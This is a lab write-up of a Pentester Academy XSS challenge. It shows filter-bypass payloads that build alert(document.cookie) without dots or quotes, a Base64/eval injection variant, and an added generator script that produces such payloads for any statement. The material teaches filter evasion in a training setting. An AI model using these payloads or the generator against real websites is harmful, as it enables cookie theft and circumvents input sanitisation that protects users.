Generic character filter bypassing for XSS attacks

I was playing with the Pentester Academy WAP Challenges when I got to Challenge 36 (XSS) and got stuck. The challenge would have been easy if it only wanted an alert box, but it wanted the cookie value. I needed the dot (.) operator to call document.cookie inside alert, but the backend filtered out dot characters. After a little searching on Google, I came up with this solution.

<script>
function write(str) {
    var s = /write/;      // regex literal; appending it to a string yields "/write/"
    var w = String();     // empty string, produced without typing a quote character
    var n = String();
    w += s;
    w += s;               // w is now "/write//write/"
    n += w[1] + w[2] + w[3] + w[4] + w[5];   // n is "write", built one character at a time
    document[n](str);     // bracket access: the same call as the dotted form, with no dot in the source
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;                   // w is "/fromCharCode/"
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + w[11] + w[12];   // n is "fromCharCode"
// the character codes spell out the alert(cookie) script tag; 46 is the dot the filter would have removed
write(String[n](60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62));
</script>

and ta-da!

The payload itself contains no literal dot (and no quote character either). The method names write and fromCharCode are recovered by indexing into the string form of a regex literal (/write/ coerces to "/write/", whose characters 1 to 5 spell write), bracket notation such as document[n] stands in for dotted property access, and the final <script>alert(document.cookie)</script> is assembled at runtime from character codes with String.fromCharCode and injected with document.write. The filter only ever sees the source text; it cannot stop the script from producing the forbidden character itself, since character code 46 is the dot.

Thanks to Pentester Academy for this great challenge.

PS: Sometimes there is an easier way, too: Base64-encode the filtered statement and pass the decoded text to eval. The Base64 alphabet contains no dot, so the encoded statement passes a dot filter untouched. Note, though, that this variant needs eval, atob, parentheses and one pair of quotes to survive the filter, whereas the payload above uses no quote at all.

Example:

"><script>eval(atob('BASE64STRINGFORFILTEREDSTATEMENTS'));</script>
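The following is an added example, not code from the original post or from Pentester Academy. It packages both bypasses above into a small generator: the regex-literal trick for a dot-free, quote-free payload, and the Base64/eval shortcut. It also checks which filtered characters each payload still contains, and it runs the dot-free payload against a stand-in document object so the indirection can be verified under Node without a browser. The filter model (dropping '.' and both quote characters) is an assumption; adjust FORBIDDEN to the filter you actually face.

```javascript
// Added example (not from the original post): a generator for the two bypasses
// described above, plus a check that the result really contains none of the
// characters a filter might strip. The filter model (drop '.' and quotes) is an
// assumption; adjust FORBIDDEN to the filter you are actually facing.

const FORBIDDEN = ['.', '"', "'"];

// Spell an identifier without dots or quotes: a regex literal coerced to a string
// ("/write/") and indexed one character at a time, as the post does.
function nameFromRegex(name) {
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(name)) {
    throw new Error('plain identifier expected: ' + name);
  }
  const str = `(String()+/${name}/)`;   // evaluates to "/name/" at runtime
  return Array.from(name, (_, i) => `${str}[${i + 1}]`).join('+');
}

// UTF-16 code units of a string, as the comma-separated argument list for fromCharCode.
function charCodes(str) {
  return Array.from(str, c => c.charCodeAt(0)).join(',');
}

// Dot-free, quote-free payload: document[write](String[fromCharCode](...codes...)),
// where the decoded string is <script>statement</script>.
function buildDotFreePayload(statement) {
  const inner = `<script>${statement}</script>`;
  const js = `document[${nameFromRegex('write')}]` +
             `(String[${nameFromRegex('fromCharCode')}](${charCodes(inner)}))`;
  return `<script>${js}</script>`;
}

// The post's shortcut: Base64 the statement and eval the decoded text.
// Needs eval, atob and one pair of quotes to survive the filter.
function buildBase64Payload(statement) {
  const b64 = Buffer.from(statement, 'utf8').toString('base64'); // btoa() in a browser
  return `<script>eval(atob('${b64}'));</script>`;
}

// Which forbidden characters does a payload still contain?
function violations(payload, forbidden = FORBIDDEN) {
  return forbidden.filter(ch => payload.includes(ch));
}

// Run the dot-free payload against a stand-in document whose write() just records
// its argument, so we can confirm the indirection resolves to the intended markup.
function simulate(statement) {
  const payload = buildDotFreePayload(statement);
  const js = payload.slice('<script>'.length, -'</script>'.length);
  let written = '';
  const fakeDocument = { write: s => { written += s; } };
  new Function('document', js)(fakeDocument);
  return { payload, written, violations: violations(payload) };
}

// Usage:
const demo = simulate('alert(document.cookie)');
console.log(demo.payload);
console.log('decodes to:', demo.written);             // <script>alert(document.cookie)</script>
console.log('forbidden chars left:', demo.violations); // []
console.log('base64 variant leaves:',
            violations(buildBase64Payload('alert(document.cookie)'))); // [ "'" ]
```

The character-code list that buildDotFreePayload emits for alert(document.cookie) is the same list as in the post's one-liner, so the generator is a direct generalisation of that payload to any statement. The violations check is the practical takeaway: the regex-literal construction passes a filter that strips dots and quotes, while the Base64 variant still depends on the quotes around the encoded string getting through.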

Furkan ÇALIŞKAN
